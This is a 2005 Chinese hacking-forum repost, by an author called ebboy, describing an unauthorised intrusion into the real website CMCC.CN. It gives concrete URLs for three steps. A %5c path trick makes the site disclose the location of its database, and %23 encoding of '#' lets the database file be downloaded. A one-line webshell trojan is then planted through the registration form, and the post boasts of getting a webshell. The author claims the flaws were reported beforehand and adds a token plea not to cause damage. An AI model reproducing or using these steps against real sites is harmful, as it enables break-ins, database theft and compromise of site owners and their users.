网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > 入侵实例 > 入侵中国站长联盟 CMCC.CN(图)  

入侵中国站长联盟 CMCC.CN(图)

2005-04-23  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

作者:ebboy 文章来源:http://hackerblog.77169.com/
作者:ebboyQQ:271214748
中国站长联盟 CMCC.CN 大家都注册过吧~~哈 ~一个算是比较大的站~~
最近偶也有注册~~看它的网站太垃圾(可是人家聪明啊,搞联盟来赚钱)~做的也不好看~给人一种感觉:是不是有洞洞?!!!
 其实偶不想写这篇文章的,早在一个月前偶就用他们的在线qq客服告诉说有漏洞~!!可到现在也没扑上!!没有安全,能赚钱吗?毁了名誉,那◎#¥%……※
 开始:打开 http://www.cmcc.cn/join/show.asp?id=886
1。暴库
  将join后的/改为%5c!
  原理请看我的blog收录:http://hackerblog.77169.com
 暴库的原理与方法
大家看图,库被搞出来了~

  'd:\wwwroot\shuilong\wwwroot\admin\#pacmcc.asp'不是一个有效的路径。 还有点安全意识 ,加了个#~
再打开:http://www.cmcc.cn/join/admin/#pacmcc.asp

网管下载dl.bitscn.com


HTTP 404 - 无法找到文件好 我们把#改为%23编码,再打开:
http://www.cmcc.cn/join/admin/%23pacmcc.asp 出来了
2。
 注册个站点资料~插入一句话木马~!!!
3。
  得到一个webshell~^_^哈 爽~_~(截图保留)

大家不要搞破坏啊~~!玩玩就ok咯~~关键是要学黑客知识~
提高安全技术~!~!!~~!这样才会更屌洒~!!!!!
TAGs联盟   站长   入侵   大家   注册   打开   安全   作者   暴库    
 上一篇:BBSXP 完全版轻松搞定众多BBSXP论坛(图)   下一篇:美国陆军FTP服务器被入侵 技术细节分析(美国陆军服务器入侵
入侵中国站长联盟 CMCC.CN(图) 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: